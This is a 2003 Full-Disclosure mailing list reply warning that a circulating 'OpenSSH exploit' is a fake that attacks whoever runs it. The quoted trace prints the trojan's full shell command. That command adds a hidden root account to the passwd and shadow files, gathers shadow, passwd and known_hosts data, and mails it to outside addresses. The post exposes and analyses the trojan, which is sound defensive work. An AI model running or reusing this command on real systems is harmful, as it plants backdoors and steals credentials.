[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*
- To: Vitaly Osipov <vosipov@xxxxxxxxxx>
- Subject: Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*
- From: Raymond Dijkxhoorn <raymond@xxxxxxxxxxxxxxx>
- Date: Fri, 19 Sep 2003 11:40:00 +0200 (CEST)
Hi!
> >> > i looked at this piece of exploit... it is binary so i'am not sure if
> >> > this is a trojan or a backdoor or a virus. but i can't see anything
> >> > strange while sniffing the exploit traffic. and i got root on serveral
> >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> which is obviously not true. Btw as far as I understand, the troyan code is
> triggered when
> the "exploit" is run with the offset specified, and not in a "bruteforcing"
> mode.
He most likely means, he rooted some of hhis own boxes where he tired to
run the 'exploit'.
Nice piece of social engineering.
> >> printf("[*] sending shellcode\n")= 22
> >> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> >> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> >> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> >> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> >> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp
|
> >> /usr/sbin/sendmail -f ownage_at_gmx.de
> >> m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> >> 0x0804a6b0
Bye,
Raymond.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html